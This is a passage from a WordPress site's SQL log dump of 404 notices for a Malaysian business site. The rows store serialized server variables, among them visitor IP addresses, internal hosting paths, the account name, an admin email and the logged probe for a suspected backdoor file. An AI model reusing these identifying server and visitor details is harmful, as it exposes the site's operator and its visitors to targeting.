";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZV4@cZsWtvRB7UEo4-J-wAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570076922.1256\";s:12:\"REQUEST_TIME\";s:10:\"1570076922\";}}','notice','2019-10-03 04:28:45','2019-10-03 04:28:42',35908448,37697112,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.198'),(27458,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZV70hsfiPO@JcLkT9h0ZQAAAQc\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:11:\"5.45.207.40\";s:11:\"REMOTE_PORT\";s:5:\"62009\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZV70hsfiPO@JcLkT9h0ZQAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570077650.4584\";s:12:\"REQUEST_TIME\";s:10:\"1570077650\";}}','notice','2019-10-03 04:40:54','2019-10-03 04:40:51',34417104,36215336,'https://bintara.com.my/blog/tag/video-conferencing/',1,0,'5.45.207.40'),(27459,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-includes/feal.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-includes/feal.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-includes/feal.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZV87sZsWtvRB7UEo4-MogAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-includes/feal.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-includes/feal.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZV87sZsWtvRB7UEo4-MogAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"109.199.119.163\";s:11:\"REMOTE_PORT\";s:5:\"40144\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-includes/feal.php\";s:10:\"SCRIPT_URL\";s:21:\"/wp-includes/feal.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZV87sZsWtvRB7UEo4-MogAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570077934.5476\";s:12:\"REQUEST_TIME\";s:10:\"1570077934\";}}','notice','2019-10-03 04:45:36','2019-10-03 04:45:34',35196920,37008072,'https://bintara.com.my/wp-includes/feal.php',1,0,'109.199.119.163'),(27460,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.128.136\";s:11:\"REMOTE_PORT\";s:5:\"64078\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZWOzMZsWtvRB7UEo4-XQAAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570082508.9595\";s:12:\"REQUEST_TIME\";s:10:\"1570082508\";}}','notice','2019-10-03 06:01:53','2019-10-03 06:01:49',35534992,37332184,'https://bintara.com.my/?page_id=18',1,0,'108.161.128.136'),(27461,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"ED852C22-A443-4FC7-9FD2-AF032E17F4B9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZWsrpQIzTNBMmKVE4RSdwAAAI0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.198\";s:11:\"REMOTE_PORT\";s:5:\"55122\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZWsrpQIzTNBMmKVE4RSdwAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570090158.8283\";s:12:\"REQUEST_TIME\";s:10:\"1570090158\";}}','notice','2019-10-03 08:09:22','2019-10-03 08:09:19',35515744,37320616,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.198'),(27462,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5C0A3E5D-9D4C-49F9-9982-D866BED5F572\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZXFMjL-8UHe5oPGfv6bdwAAAEo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.198\";s:11:\"REMOTE_PORT\";s:5:\"56812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZXFMjL-8UHe5oPGfv6bdwAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570096434.6936\";s:12:\"REQUEST_TIME\";s:10:\"1570096434\";}}','notice','2019-10-03 09:53:59','2019-10-03 09:53:55',36008136,37807464,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.198'),(27345,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569844875.6773738861083984375000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569844875.6773738861083984375000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569844875.6773738861083984375000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569844875.6773738861083984375000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"38964\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569844875.6773738861083984375000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZHui0e1hexcz@z1ysRrBAAAAJc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZHui0e1hexcz@z1ysRrBAAAAJc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"38964\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZHui0e1hexcz@z1ysRrBAAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569845624.214\";s:12:\"REQUEST_TIME\";s:10:\"1569845624\";}}','notice','2019-09-30 12:13:50','2019-09-30 12:13:44',35208536,35460824,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569844875.6773738861083984375000',1,0,'103.6.198.69'),(27463,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570100559.2341060638427734375000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570100559.2341060638427734375000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, 